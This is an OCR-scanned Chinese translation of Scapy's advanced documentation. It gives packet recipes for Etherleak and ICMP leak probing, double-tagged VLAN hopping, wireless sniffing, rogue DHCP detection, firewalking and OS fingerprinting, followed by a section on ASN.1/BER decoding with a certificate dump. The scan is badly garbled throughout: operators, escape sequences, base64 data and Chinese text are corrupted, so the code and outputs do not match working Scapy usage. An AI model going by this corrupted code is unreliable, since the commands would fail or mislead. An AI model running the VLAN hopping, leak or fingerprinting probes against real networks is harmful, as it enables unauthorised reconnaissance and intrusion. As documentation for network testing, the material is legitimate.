1 192.168.1.1 11 
4  68.86.90.162 11 
5 4.79.43.134 11 
6 4.79.43.133 11 
7 4.68.18.62 11 
8 4.68.123.6 11 
ORAZ rel 
Etherleaking 


>>> sri(IP(dst="172.16.1.232")/ICMP()) 

«IP src-172.16.1.232 proto=1 [...] |<ICMP code=0 type=0 [...]| 
«Padding load-'00Nx02Nx01Nx00Nx04Nx06publicNxa2BNx02Nx02Nx1e' |> 
>> 


ICMP leaking 
这 是 一 个 Linux2.0 的 一 个 bug : 


>>> sri(IP(dst="172.16.1.1", options="\x02")/ICMP() ) 

«IP src=172.16.1.1 [...] |<ICMP code=0 type=12 [...] | 

«IPerror src-172.16.1.24 options-'Nx02Nx00Nx00Nx00' [...] | 
«ICMPerror code=0 type=8 id-0x0 seq-0x0 chksum-zOxf7ff | 

«Padding load-'Nx00[...]Nx00Nxid.Nx00VNx1fNxafNxd9Nxd4; \xca’ |>> 
>>> 


VLAN hopping 


在 非常 特殊 的 情况 下 ， 使 用 double 802.1q 封 装 ， 可 以 将 一 个 数据 包 跳 到 另 一 个 


VLAN ¥ : 


>>> sendp(Ether()/DotiQ(vlan-2)/DotiQ(vlan-7)/IP(dst-target)/ICM 
P()) 


Wireless sniffing 
以 下 的 命令 将 会 像 大 多 数 的 无 线 嗅 探 器 那样 显示 信息 : 


>>> sniff(iface-"athO",prn-lambda x:x.sprintf("{Doti1Beacon:%Dot 
11.addr3%\t%DotiiBeacon. info%*\t%PrismHeader .channel%\tDotiiBeaco 
n.cap%}") ) 


以 上 命令 会 产生 类 似 如 下 的 输出 : 


00:00:00:01:02:03 netgear 6L ESS+privacy+PBCC 
11:22:33:44:55:66 wireless 100 6L short-slot+ESS+privacy 
44:55:66:00:11:22 linksys 6L short-slot+ESS+privacy 
12:34:56:78:90:12 NETGEAR 6L short-slot+ESS+privacy+short 
-preamble 


0x03 Recipes 


Simplistic ARP Monitor 


以 下 的 程序 使 用 了 sniff() 有 函数 的 回调 功能 (prn 参 数 ) 。 将 Store 参数 设置 为 0， 
就 可 以 使 sniff() 函数 不 存储 任何 数据 (否则 会 存储 ) ， 所 以 就 可 以 一 直 嗅 探 下 
去 。filter 参 数 则 用 于 在 高 负荷 的 情况 下 有 更 好 的 性 能 : filter 会 在 内 核 中 应 用 ， 而 且 
Scapy 就 只 能 噢 探 到 ARP 流 量 。 


4! /usr/bin/env python 
from scapy. zou ” s: 
def arp monitor callback(pkt): 
if ARP in pkt and pkt[ARP].op in (1,2): #who-has or is-at 
return pkt.sprintf("%ARP.hwsrc% %ARP.psrc%" ) 


sniff(prn-arp monitor callback, filter="arp", store=0) 


Identifying rogue DHCP servers on your LAN 


Problem 


你 怀疑 有 人 已 经 在 你 的 LAN 中 安装 了 额外 的 未 经 授权 的 DHCP 服 务 器 -无 论 是 故意 的 
还 是 有 意 的 。 因 此 你 想 要 检查 是 否 有 任何 活动 的 DHCP 服 务 器 ， 并 确定 他 们 的 IP 和 
MAC 地 址 。 


Solution 


使 用 Scapy 发 送 一 个 DHCP 发 现 请 求 ， 并 分 析 应 答 : 


>>> conf.checkIPaddr = False 
>>> fam,hw = get if raw hwaddr(conf.iface) 
>>> dhcp discover = Ether(dstz'ff:ff:ff:ff:ff:ff")/IP(srcz"0.0.0 
.0", dst="255.255.255.255")/UDP(sport=68, dport=67 )/BOOTP(chaddr=h 
w)/DHCP(options=[("message-type", "discover"),"end"]) 
>>> ans, unans = srp(dhcp_discover, multi=True) # Press CTR 
L-C after several seconds 
Begin emission: 
Finished to send 1 packets. 

* * 


Received 8 packets, got 2 answers, remaining 0 packets 


在 这 种 情况 下 ， 我 们 得 到 了 两 个 应 答 ， 所 以 测试 网 络 上 有 两 个 活动 的 DHCP 服 务 


ans 


>>> ans.summarize() 

Ether / IP / UDP 0.0.0.0:bootpc > 255.255.255.255:bootps / BOOTP 
/ DHCP ==> Ether / IP / UDP 192.168.1.1:bootps > 255.255.255.25 

5:bootpc / BOOTP / DHCP 

Ether / IP / UDP 0.0.0.0:bootpc > 255.255.255.255:bootps / BOOTP 
/ DHCP ==> Ether / IP / UDP 192.168.1.11:bootps > 255.255.255.2 

55:bootpc / BOOTP / DHCP 


}}} 


We are only interested in the MAC and IP addresses of the replie 


S: 
üt 
>>> for p in ans: print p[1][Ether].src, p[1][IP].src 


00:de:ad:be:ef:00 192.168.1.1 
00:11:11:22:22:33 192.168.1.11 


Discussion 


我 们 设置 multi=True 来 确保 Scapy 在 接收 到 第 一 个 响应 之 后 可 以 等 待 更 多 的 应 答 
数据 包 。 这 也 就 是 我 们 为 什么 不 用 更 方便 的 dhcp request() 函数 ， 而 是 手动 地 
构造 DCHP 数 据 包 的 原因 : dhcp request() 使 用 srpi() 来 发 送 和 接收 数据 

包 ， 这 样 在 接收 到 一 个 应 答 数据 包 之 后 就 会 立即 返回 。 


此 外 ，Scapy 通 常 确保 应 答 来 源 于 之 前 发 送 请 求 的 目的 地 址 。 但 是 我 们 的 DHCP 数 

据 包 被 发 送 到 IP 广 播 地 址 (255.255.255.255) ， 任 何 应 答 数据 包 都 将 回复 DCHP 服 
务 器 的 IP 地 址 作为 其 源 P 地 址 (e.g. 192.168.1.1) 。 由 于 这 些 |P 地 址 不 匹配 ， 我 们 
必须 在 发 送 请 求 前 使 用 conf .checkIPaddr = False 来 禁用 Scapy 的 check ° 


See also 


ibid 
TTL 减 一 操作 过 ， 只 有 没 被 过 滤 的 数据 包 会 产生 一 个 ICMP TTL 起 时 


>>> ans, unans = sr(IP(dstz"172.16.4.27", ttl-16)/TCP(dportz(1,1 
024))) 
>>> for Srr in ans: 
if r.haslayer(ICMP) and r.payload.type == 11: 
print s.dport 


在 对 多 网 卡 的 防火 墙 查找 子 网 时 ， 只 有 它 自 己 的 网 卡 IP 可 以 达到 这 个 TTL : 
>>> ans, unans = sr(IP(dst="172.16.5/24", ttl-15)/TCP()) 


>>> for i in unans: print i.dst 


TCP Timestamp Filtering 


Problem 


X ° —4 ld 常见 的 情况 就 是 没有 设置 TCP 时 间 惟 选项 ， 而 许 
多 aes ` 来 丢弃 这 样 的 TCP 数 据 包 。 


Solution 
为 1 ikScapyi E95 SA Ef Bo xus f de FR] E AE xe h 


>>> sri(IP(dst="72.14.207.99")/TCP(dport=80, flags="S", options=[ ( 
'Timestamp',(0,0))])) 


Viewing packets with Wireshark 


Problem 


你 已 经 使 用 Scapy 收 集 或 者 嗅 探 了 一 些 数据 包 ， 因 为 Wireshark 高 级 的 数据 包 展 示 功 
能 ， 你 想 使 用 Wireshark 查 看 这 些 数据 包 。 


Solution 


正好 可 以 使 用 wireshark() 函数 : 


>>> packets = Ether()/IP(dst=Net("google.com/30"))/ICMP() # 
first generate some packets 
>>> wireshark(packets) # 


show them with Wireshark 


Discussion 


wireshark() HAT YA X — AlE FH pcapsc fF > 62 T RIE 6, * REESE 
人 台 启 动 Wireshark， 使 其 在 启动 时 读 取 该 文件 。 
请 记 住 Wireshark 是 处 理 第 二 层 的 数据 包 (通常 被 称 为 “ 帧 ") 。 所 以 我 们 必须 为 
ICMP 数 据 包 添 加 一 个 Ether() 头 。 如 果 你 直接 将 IP 数 据 包 (第 三 层 ) 传递 给 
Wireshark， 你 将 会 得 到 一 个 奇怪 的 结果 。 


你 可 以 通过 改变 conf.prog.wireshark 的 配置 设置 ， 来 告诉 Scapy 去 哪 寻 找 Wireshark 
可 执行 文件 。 
OS Fingerprinting 


ISN 


Scapy 的 可 用 于 分 析 ISN (初始 序列 号 ) 递增 来 发 现 可 能 有 漏洞 的 系统 。 首 先 我 们 
将 在 一 个 循环 中 发 送 SYN 探 头 ， 来 收集 目标 响应 : 


>>> ans, unans=srloop(IP(dst="192.168.1.1")/TCP(dport=80, flags="S 
ES 


一 旦 我 们 得 到 响应 之 后 ， 我 们 可 以 像 这 样 开始 分 析 收 集 到 的 数据 : 


>>> temp = 
>>> for s,r in ans: 
temp = r[TCP].seq - temp 
print str(r[TCP].seq) + "\t+" + str(temp) 


4278709328 *4275758673 


4279655607 +3896934 
4280642461 +4276745527 
4281648240 +4902713 
4282645099 +4277742386 


4283643696 +5901310 


nmap fp 


在 Scapy 中 支持 Nmap 指 纹 识 别 (是 到 Nmap v4.20 的 “第 一 代 " 功 能 ) 。 在 Scapy v2 
中 ， 你 首先 得 加 载 扩 展 模块 : 


>>> load module("nmap") 


如 果 你 已 经 安装 了 Nmap， 你 可 以 让 Scapy 使 用 它 的 主动 操作 系统 指纹 数据 库 。 清 
确保 version 1 签名 数据 库 位 于 指定 的 路 径 : 


>>> conf.nmap base 


然后 你 可 以 使 用 namp fp() 函数， 该 函数 和 Nmap 操 作 系 统 检 测 引 擎 使 用 同样 的 
探 针 : 


>>> nmap fp("192.168.1.1",oport-443, cport-1) 

Begin emission: 

.**** ,**Finished to send 8 packets. 

Received 58 packets, got 7 answers, remaining 1 packets 

(1.0, ['Linux 2.4.0 - 2.5.20', 'Linux 2.4.19 w/grsecurity patch' 
f 

'Linux 2.4.20 - 2.4.22 w/grsecurity.org patch', 'Linux 2.4.22-ck 
2 (x86) 

w/grsecurity.org and HZ=1000 patches', 'Linux 2.4.7 - 2.6.11']) 


p0f 


如 果 你 已 在 操作 系统 中 安装 了 p0f， 你 可 以 直接 从 Scapy 中 使 用 它 来 猜测 操作 系统 名 
称 和 版 本 。 ( 仅 在 SYN 数 据 库 被 使 用 时 ) 。 首 先 要 确保 p0f 数 据 库存 在 于 指定 的 路 


5 . 
径 : 


>>> conf.pOf base 


例如 ， 根 据 一 个 捕获 的 数据 包 猜 测 操作 系统 : 


>>> Sniff(prn=prnpof ) 

192.168.1.100:54716 - Linux 2.6 (newer, 1) (up: 24 hrs) 
-> 74.125.19.104:www (distance 0) 

«Sniffed: TCP:339 UDP:2 ICMP:0 Other :156> 


使 用 方法 
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高 级 用 法 


译 者 : 草帽 小 子 _DJ 

来 源 : Python Scapy (2.3.1) 文档 学 习 ( 四 ) : 高 级 用 法 
原文 : Advanced usage 

协议 : CC BY-NC-SA 2.5 


ASN.1 和 SNMP 


fF 4 & ASN.1 ? 


注意 : 这 只 是 我 对 ASN.1 的 个 人 观点 ， 我 会 尽 可 能 的 做 简单 的 解释 。 至 于 更 多 
的 理论 或 者 学 术 观 点 ， 我 相信 你 会 在 互联 网 上 找到 更 好 的 。 


ASN.1( 抽 人 象 语法 标记 ) 是 一 种 对 数据 进行 表示 、 编 码 、 传 输 和 解码 的 数据 格式 。 它 
用 一 种 独立 的 方式 给 数据 编码 ， 用 指定 的 编码 规则 给 数据 编码 。 


最 常用 的 编码 规则 是 BER( 基 本 编码 规则 ) 和 DER( 识 别名 编码 规则 )， 两 者 看 起 来 是 
一 样 的 ， 但 是 后 者 特殊 在 它 保证 了 生成 的 编码 的 唯一 性 ， 当 谈 到 加 密 ， 哈 希 和 签名 
时 ， 这 个 属性 非常 有 意思 。 


ASN.1 提 供 了 基本 的 对 象 : 整数 ， 多 种 类 型 的 字符 串 ， 浮 点 数 ， 布 尔 值 ， 容 器 ， 等 
等 。 它 们 组 成 了 通用 类 。 一 种 给 定 的 协议 能 提供 组 成 其 他 对 象 的 上 下 文 类 。 比 如 ， 
SNMP 定 义 了 PDU SET 和 PDU GET 对 象 ， 还 有 其 他 的 应 用 和 私有 类 。 


每 一 个 对 象 将 会 给 一 个 标签 用 来 定义 编码 规则 。 从 1 开始 用 于 通 由 类 ，1 是 布尔 值 ， 
2 是 整 型 ，3 是 一 个 字 节 字符 串 ，6 是 DID，48 是 一 个 序列 。 标 签 来 自 Context 类 ， 
从 0xa0 开 始 。 当 从 0xa0 遇 到 一 个 对 象 标 签 ， 我 们 将 需要 知道 能 够 解码 

的 context 。 比 如 说 ， 在 SNMP 的 context 下 ，0xa0 有 是 一 个 PDU GET > 
而 在 X509 的 context 下 ， 它 是 一 个 证 书 版 本 的 容器 。 


其 他 对 象 通过 组 装 基本 的 对 象 产生 。 新 的 结构 是 是 用 先前 已 经 定义 或 者 存在 的 序列 
和 阵列 组 成 。 最 终 的 对 象 (X509 证 书 ， 一 个 SNMP 数 据 包 ) 是 一 标 非 叶子 结 点 序列 的 
树 ， 并 设置 对 象 (或 者 派生 的 对 象 )， 叶 子 节点 是 整数 ， 字 符 串 ，OID 等 等 。 


Scapy 和 ASN.1 


Scapy 提 供 了 一 种 简单 的 方法 加 解密 ASN.1， 还 提供 了 一 个 编码 器 /解码 器 。 它 比 
ASN.1 的 解析 器 更 加 宽松 并 忽略 了 一 些 约束 。 它 不 会 取代 ASN.1 的 解析 器 或 者 是 
ASN.1 的 编译 器 ， 事 实 上 ， 它 被 编写 的 可 以 编码 或 者 解密 损坏 的 ASN.1。 它 可 以 处 
理 损坏 的 编码 字符 串 并 创建 他 们 。 


ASN.151 & 


注意 : 这 里 介绍 的 许多 类 的 定义 都 用 到 了 元 类 。 如 果 你 不 仔细 的 看 源码 ， 只 看 我 的 
讲解 ， 你 可 能 认为 他 们 有 时 的 行为 很 神奇 。Scapy 的 ASN.1 引 擎 提供 连接 对 象 和 他 
们 的 标签 。 它 们 都 继承 自 ASN1 Class 。 第 一 个 是 ASN1_Class_UNIVERSAL ° © 
提供 的 标签 是 最 为 通用 的 标签 。 每 个 新 的 context (SNMPX509) 都 将 继承 它 ， 并 
添加 自己 的 标签 。 


class ASN1 Class UNIVERSAL(ASN1 Class): 
name = "UNIVERSAL" 

# [...] 

BOOLEAN 

INTEGER 

BIT STRING - 3 


# [...] 


class ASN1_Class_SNMP(ASN1 Class UNIVERSAL): 
name-" SNMP" 
PDU GET = 0xa0 
PDU NEXT = Oxal 
PDU RESPONSE = 0xa2 


class ASN1 Class X509(ASN1 Class UNIVERSAL): 


name="X509" 
CONTO = 0xa0 
CONT1 = Oxal 


i [oos] 


所 有 的 ASN.1 对 象 都 被 简单 的 Python 实例 表示 ， 并 隐藏 的 原始 的 值 。 简 单 的 逻辑 
被 ASN1_0bject 所 继承 处 理 。 因 此 他 们 相当 简单 。 


class ASN1 INTEGER(ASN1 Object): 
tag = ASN1 Class UNIVERSAL.INTEGER 


class ASN1 STRING(ASN1 Object): 
tag - ASN1 Class UNIVERSAL.STRING 


class ASN1 BIT STRING(ASN1 STRING): 
tag = ASN1 Class UNIVERSAL.BIT STRING 


这 些 实例 可 以 组 装 并 创建 一 个 ASN.1 树 : 


>>> X=ASN1_SEQUENCE([ASN1_INTEGER(7),ASN1_STRING("egg"),ASN1_SEQ 
UENCE( [ASN1. BOOLEAN(False)])]) 
>>> x 
<ASN1_SEQUENCE[ [<ASN1_INTEGER[7]>, <ASN1 STRING['egg']», «ASNi S 
EQUENCE[ [<ASN1 BOOLEAN [False]»]]»]]» 
>>> x.show() 
# ASN1 SEQUENCE: 
<ASN1_INTEGER[7]> 
<ASN1_STRING[ 'egg' ]» 
# ASN1 SEQUENCE: 
<ASN1 BOOLEAN[False]> 


编码 引擎 


作为 标准 ，ASN.1 和 编码 是 独立 的 。 我 们 只 看 到 怎样 生成 一 个 组 合 的 ASN.1 对 象 ， 
解码 或 者 编码 它 我 们 只 需要 选择 一 个 解码 规则 。Scapy 目 前 只 提供 BER 编 码 规则 
(事实 上 ， 它 可 能 是 DER 规则 ，DER 看 起 来 像 是 BER， 除 了 一 小 部 分 编码 通过 授权 
才 可 以 得 到 ) 。 我 称 它 为 ASN.1 编 解码 器 。 

编码 和 解码 都 是 编 解码 器 的 类 方法 提供 的 。 比 如 说 BERcodec INTEGER 提供 了 一 
个 enc() 和 一 个 dec() 类 方法 可 以 将 编码 的 字符 串 和 其 类 型 的 值 之 间 进 行 转 

换 。 它 们 都 继承 自 BERcodec Object ， 它 能 解码 任何 类 型 。 


>>> BERcodec INTEGER.enc(7) 


' NX02NX01*Nx07 ' 

>>> BERcodec BIT STRING.enc("egg") 
'NXO3Nx03egg' 

>>> BERcodec STRING.enc("egg") 
'\x04\x03egg' 


>>> BERcodec_STRING.dec('\x04\x03egqg' ) 
(<ASN1_STRING['egg']>, '') 
>>> BERcodec_STRING.dec('\x03\x03egqg' ) 
Traceback (most recent call last): 
File "<console>", line i, in ? 
File "/usr/bin/scapy", line 2099, in dec 
return cls.do_dec(s, context, safe) 
File "/usr/bin/scapy", line 2178, in do_dec 
1,s,t = cls.check_type_check_len(s) 
File "/usr/bin/scapy", line 2076, in check_type_check_len 
1,s3 = cls.check_type_get_len(s) 
File "/usr/bin/scapy", line 2069, in check_type_get_len 
s2 = cls.check_type(s) 
File "/usr/bin/scapy", line 2065, in check_type 
(cls. name , ord(s[0]), ord(s[0]),cls.tag), remaining-s) 
BER BadTag Decoding Error: BERcodec STRING: Got tag [3/0x3] whil 
e expecting <ASN1Tag STRING[4]> 
### Already decoded ### 
None 
### Remaining ### 
"\x03\x03egg' 
>>> BERcodec Object.dec('Nx03Nx03egg' ) 
(<ASN1_BIT_STRING['egg']>, '') 





ASN.1 对 象 使 用 它们 的 enc() 方法 解码 。 这 个 方法 必须 被 我 们 要 使 用 的 编 解码 器 
所 调用 ， 所 有 的 便 把 解码 器 都 被 ASN1_Codecs 对 象 所 引用 。 str() 也 能 被 用 
到 ， 在 这 种 情况 下 ， 上 默认 的 编 解码 器 ( conf.ASN1 default codec ) 也 会 被 用 到 。 


>>> x.enc(ASN1_Codecs.BER) 
"O\r\x02\x01\x07\x04\x03egg0\x03\x01\x01\x00' 
>>> str(x) 
"O\r\x02\x01\x07\x04\x03egg0\x03\x01\x01\x00' 
>>> xXx, remain = BERcodec Object.dec( ) 

>>> xx.show() 
# ASN1 SEQUENCE: 

<ASN1_INTEGER[7L]> 

<ASN1_STRING[ 'egg']> 

# ASN1 SEQUENCE: 

<ASN1_BOOLEAN[ OL ]» 


>>> remain 


默认 情况 下 ， 解 码 器 使 用 Universal 类 进行 解码 ”这 就 意味 着 在 Context 类 中 
定义 的 对 象 将 不 会 被 解码 ， 这 有 一 个 比较 好 的 原因 : 这 个 解码 取决 于 context ! 


>>> certz" n 
MIIF5jCCA86gAwWIBAgIBATANBgkqhkiG9wOBAQUFADCBgzELMAkGA1UEBhMC 
VVMXHTAbBgNVBAOTFEFPTCBUaW11IFdhcm5lciBJbmMuMRwwGgYDVQQLEXNB 
bWwVyaWNhIE9ubGluzSBJbmMuMTcwNQYDVQQDEy5BTOwgVGltZSBXYXJuZXIg 
Um9vdCBDZXJOaWZpY2FOaw9uIEFidGhvcmlOeSAyMBAXDTAyMDUyOTA2MDAW 
MFoXDTM3MDkyODIzNDMwMFowgYMXCZzAJBgNVBAYTA1VTMROwGwYDVQQKEXRB 
TOwgVGltZSBXYXJuZXIgSWb5jL:jEcMBoGA1UECxMTQW1 lcmljYSBPbmxpbmUg 
SW5 j LjE3MDUGA1UEAxMuQU9MIFRpbWUGgV2FybmVyIFJvb3QgQ2VydGlmawNh 
dGlvbiBBdXRob3JpdHkgMjCCAiIwDQYJKoZIhvcNAQEBBQADgg IPADCCAgoC 
ggIBALQ3WggWmRToVbEb JGv8x4vmh6mJ70uZzU9AhqS2TcnZsdw8TQ2FTBVs 
RotSeJ/AI/1n9SQ6aF3Q92RhQVSji6UIOilbm2BPJOPRYxJWSXakFsKlnUWs 
i4SVqBax7J/qJBrvuVdcmiQhLEOOCR-4*mrF1FdAOYXFSMFkpBd4aVdQxHAWZg 
/BXxD*r1FHjHDtdugRxevi7nOirYlxcwfACtCJOzr7iZYYCLqJV-«*FNwSbKTQ 
209ASQI24W6p1h2WVgSysyOWVoaP2SBXgMinEG2wTPDaRrbqJS5Gr42whTgO 
ixQmgiusrpkLjhTXUr2eacOGAgvqdnUxCCcAzGSGFQ-*aJLZ81N2f XI2rSAG2X 
+Z/nKcrdH9cG6r j JuQkhn8g/BsXS6RJGAE57COtCPStIbpin3UsCBETzkxml 
J85per5n0/xQpCyrw2u544BMzwVhSyvcG7mmOtCq9Stz-86QNZ8MUhy/XCFh 
EVsVS6kkUfykXPcXnbDS-*gfpjibkGoxoigTTfFrjnqKhynFbotSg5ymFXQNo 
Kk/SBtc9+cMDLz91+WceRODTYw/j1Y75hauXTLPXJuuwCpTehTacyH+BCQJJ 
Kg71ZDIMgtG6aoIbsOtOEfOMd9afv9w3pKdVBC/UMe j TRrkDFNOSTILkKt1Ex 

.. MVCgyhwn2RAurda9EGYrw7AiShJbAgMBAAGj YZBhMA8GA1UdEwEB/wQFMAMB 

. Af8wHQYDVROOBBYEFE9pbQN+nZ8HGEO8t xB01b+pxCAoMB8GA1UdIwQYMBaA 
FE9pbQN+nZ8HGEO8t xB01b+pxCAoMA4GA1UdDWEB/wQEAwIBhjANBgkqhkiG 
Q9wOBAQUFAAOCAgEAO/Ouyuguh4X7ZVnnrREUpVe8wJ8kEle7+z802u6teiod 

.. cnAxa8cZmIDJgt43d15Ui47y6mdPyXSEkVY J1eV6moG2gcKtNuTXxVBFT8zRF 

. ASbISRq8NEQh3q01/HYWdyGQgJhXnU7q7C-*qPBR7V8F-*GBRn7iTGvboVsNIY 
vbdVgaxTwOj daRITQrcCtQVBynlQboIOCXKTRuidDV29rsA4prWPVVRaAMCf / 
drr3uNZKA9m1-*VLQTkCpx-XCMseqdiThawVQ68W/ClTluUI8JPu3B5wwn3la 
5uBAUhX0O/KrOVv1El4ftDmVyXr4m-02kLQgH3thcoNyBM5kY JRF3p-*v9WAks 
mwsbivNSPXpNSGDxoPYzAlOL7SUJuAOt7Zdz7NeWHA45gDtoQmy8YJPamTQr5 
O8tiwswvziRpyQoij 1mn941IM19drNZxDAGrElWe6nEXLUA4399x0AU++Cr YD 
062KRffaJO00psUjf5BHklka9bAI-11HIlRcBFanyqqryvy91G2/QuRqT9Y41 
XICHPpQvZuTpqP9BnHAqTyo5GJUef vthATXRCCAoGKQWDzH90mw;j kyB24f OH 
hdFbP9IcczLd-«rn4jM8Ch3qaluTtT4mNUOOrDhPAARWOeT jb/G49n1G2UBOL 
人 
""" .decode("base64") 

>>> (dcert,remain) = BERcodec Object.dec(cert) 
Traceback (most recent call last): 

File "<console>", line i, in ? 

File "/usr/bin/scapy", line 2099, in dec 
return cls.do_dec(s, context, safe) 

File "/usr/bin/scapy", line 2094, in do_dec 
return codec.dec(s,context, safe) 

File "/usr/bin/scapy", line 2099, in dec 
return cls.do_dec(s, context, safe) 

File "/usr/bin/scapy", line 2218, in do_dec 
o,s = BERcodec_Object.dec(s, context, safe) 

File "/usr/bin/scapy", line 2099, in dec 
return cls.do_dec(s, context, safe) 


File "/usr/bin/scapy", line 2094, in do dec 
return codec.dec(s,context, safe) 
File "/usr/bin/scapy", line 2099, in dec 
return cls.do dec(s, context, safe) 
File "/usr/bin/scapy", line 2218, in do dec 
o,s = BERcodec Object.dec(s, context, safe) 
File "/usr/bin/scapy", line 2099, in dec 
return cls.do dec(s, context, safe) 
File "/usr/bin/scapy", line 2092, in do dec 
raise BER Decoding Error("Unknown prefix [9602x] for [%r]" 96 
(p,t), remaining-s) 
BER Decoding Error: Unknown prefix [a0] for ['\xa0\x03\x02\x01\x 
O2\x02\x01\xO10\r\xO6\t*\x86H...' ] 
### Already decoded ### 
a 
### Remaining ### 
"\xaO\x03\x02\x01\x02\x02\x01\xO10\r\xO6\t *\X86H\X86\xXF7\r\x01\x 
01\x05\x05\xO00\x81\x831\xObO\t\xXO6\xXO3U\xO4\x06\xX13\x02US1\x1d0 
NX1bNX06NX03UNXOANnNX13NX14AOL Time Warner Inc.1\x1ic0\x1a\x06\x0 
3U\x04\xOb\x13\x13America Online Inc.1705Nx06Nx03UNXOANXO3NX13.A 
OL Time Warner Root Certification Authority 20Nx1eNx17Nr02052906 
0000ZNx17Nr370928234300Z0NX81NX831NxObONtNX06NX03UNXOANXOGNX13NX 
O2US1\x1d0\x1b\x06\xO3U\x04\n\x13\x14AOL Time Warner Inc.1Nx1cON 
X1a\xO06\xO3U\x04\xOb\x13\x13America Online Inc.1705Nx06Nx03UNx04 
\x03\x13.AOL Time Warner Root Certification Authority 20\x82\x02 
"ONrNXOGNC*NX86HNX86NXf 7NrNX0O1NXO1NX01NX05NX00NX03NX82NX02NXOf NX 
000Nx82Nx02NnNX02NX82NX02Nx01Nx00Nxb47ZNXx08NXx16NX99NXx14NXxe8UNXxb1 
NX1b$kNxf cNxc7NX8bNxe6Nx87NXxa9Nx89NxeeNx8bNx99NxcdOQNx86NxaANxb6 
MNxc9Nxd9NxbiNxdc«MNrNx85LNXx151FNX8bRXNx9f Nxf 82NxfdgNxf5$:h]NxdO 
\xf7daAT\xa3\x8b\xa5\x08\xd2) [Nx9b O&\x83\xd1ic\x12VIV\xa4\x16\xc 
2\xa5\x9dE\xac\x8b\x84\x95\xa8\x16\xb1\xec\x9f\xea$\xia\xef\xbow 
NNNx9a$! , M\xOeq\xif\xa6\xac J Et\x03\x98\xc4T\x8C\x16 JAw\x86\x95u\ 
x@0cGNx01f “\xfc\x15\xf1i\x0f\xea\xf5\x14x\xc7\x0e\xd7n\x81\x1ic4\xb 
fANxe7: *\xd8\x97\x170| Nx00NxadNx08Nx9d3Nxaf NXb8NXx99aNx80NXx8bNxa8 
NX95-Nx14NxdcNx121Nxa4NxdONxd8NxefQINXx026Nxf9nNxa9Nxd6Nx1dNx96VN 
X04ANXb2Nxb3 -Nx16VNx86Nx8f Nxd9. W\x80\xcdg\x10m\xbOL\xfO\xdaF\xb6\ 
xea%.F\xaf\x8d\xb0\x8584\x8b\x14&\x82+\xac\xae\x99\xOb\x8e\x14\x 
d7R\xbd\x9ei\xc3\x86\x02\xOb\xeavu1\t\xce3\x19 ! \x85C\xe6\x89-\x9 
f?67gNxf12jNxd2Nx0O0mNx9 7Nxf 9Nx9fNxe7)NxcaNxddNx1f Nxd7Nx06NxeaNxb8 
\xc9O\xb9\t !\x9F\xc8?\x06\xc5\xd2\xe9\x12F\xOON{\x08\xebB=+Hn\x9d 
g\xddK\x02\xe4D\xf3\x93\x19\xa5\ '\xceiz\xbeg\xd3\xfcP\xa4, \xab\x 
c3k\xb9\xe3\x80L\xcf\x05akt+\xdc\x1ib\xb9\xa6\xd2\xd0\xaa\xf5+s\ xf 
bNxceNx905Nx9f NXOCRNX1CNxbf NN ! a\xiL[\x15K\ xa9$Q\xfo\xa4\V\\xFf7\x1 
7\x9d\xbO\xd2\xfa\x07\xe9\x8FV\xe4\x1a\x8ch\x8a\x04\xd3 | Z\xe3\x9 
e\xa2\xal\xcag[\xa2\xd4\xa0\xe7 )\x85 ]\xO3h*O\xd2\x06\xd7=\xf9\xc 
3Nx03/?eNxf9gNx1eGQNxd3cNxOf Nxe3Nxd5Nx8eNxf 9Nx85NxabNx97LNxb3Nxd 
7&NxebNx96NnNx94NxdeNx856NX9CNXC8NX7 f NXB1NtENXO2I*NxOeNxf5d2NXx0cN 
x82Nxd1Nxbaj Nx82Nx1bNxb3Kt Nx11Nxf 3Nx8cwNxde6Nx9f Nxbf Nxdc7Nxa4ANxa? 
UNx04/Nxd41Nxe8Nxd3FNxb9Nx03 | \xda\x12NYd\xb7Q11P\xa0\xca\xic\'\x 
d9Nx10. NxadNxd6NxbdNx10f -Nxc3Nxb0" J\x12[\x02\x03\x01\x00\x01\xa3 
COaO0NXxOf NXOGNXxOSUNX1dNX13NXx01NX01NXxf f NXO4ANX050NXOSNXO1NX01NXf f ON 
X1d\xO06\xO3U\x1d\x0e\x04\x16\x04\x140im\x03~\x9d\x9F\xXO7\x18C\xb 
C\xb7\x10ON\xd5\xbf\xa9\xc4 (O\xLF\xXO6\xO3U\x1d#\x04\x180\x16\x80 


\x140im\x03~\x9d\x9F\xO7\x18C\xbc\xb7\x1ON\xd5\xbf\xa9\xc4 (0NX0 
eNxX06NxO3UNx1dNxOf NxXO1NXx01Nxf f NXOANXOANXOSNXO2NXO1NX860NrNX06NE* 
NX86HNX86Nxf 7NrNX01NXO1NX05NX05NX00NX03NX82NX02NX01NX00 ; Nxf 3Nxae 
\xca\xe8. NX87NX85NxfbeYNxe7NxadNx11Nx14NxabWNxbcXNx9f $Nx12WNxbbN 
xfb?4NxdaNxeeNxadz*ArpikNxc7NXx19Nx98NXx80Nxc9Nx82Nxde7w^TNx8bNx8e 
\xf2\xeagO\xc9t\x84\x91V\ t\xd5\xe5z\x9a\x81\xb6\x81\xc2\xad6\xe4 
\xf1T\x11S\xf34E\x01&\xc8\xe5\x1a\xbc4D! \xde\xad%\xfcv\x16w! \x90 
\x80\x98W\x9dN\xea\xec/\xaa<\x14{W\xc1~\x18\x14g\xee$\xc6\xbd\xb 
a\x15\xbO0\xd2\x18\xbd\xb7U\x81\xacS\xc0\xe8\xddi\x12\x13B\xb7\x0 
2\xb5\xO5A\xcayPn\x82\x0eqr\x93F\xe8\x9d\r ]\xbd\xae\xce) \xadc\xd 
5UNX16Nx800N '\xffv\xba\xf7\xb8\xd6J\xe3\xd9\xb5\xF9OR\XdON@\ xa9\x 
c7\xe5\xc22\xc7\xaav$\xelk\xO5P\xeb\xc5\xbf\nT\xe5\xb9B<$\xfb\xb 
7\X07\x9CO\x9FyYZ\xe6\xeO@R\X15\xf ANxf cNxaaNxf AVAXf 9D\x97\x87\xed 
NXxOeer^Nxbe&Nxf bMNxaA- NX08Nx07NxdeNxd8NNNxaONxdc Nx813NXx99NX1896NX 
11wNxa7NxebNxfdXNt, NX99kNx1bNx8aNxf 3R?2NX1aMH Nxf1Nxa0Nxf63Nx02SN 
x8b\xed%\t\xb8\r -NxedNx97sNxecNxd7Nx96Nx1f Nx8e ^ NxXO9eNxdaNx10Nx9b/ 
NX18$Nxf6NxaeMNnNxf9; \xcbu\xc2\xcc/\xce$i\xc9\n"\x8eY\xa7\xfF7\x8 
2\x0c\xd7\xd7k5\x9cC\x00j Nxc4Nx95gNxbaNx9cENxcbNxb8Nx0e7Nxf 7Nxdc 
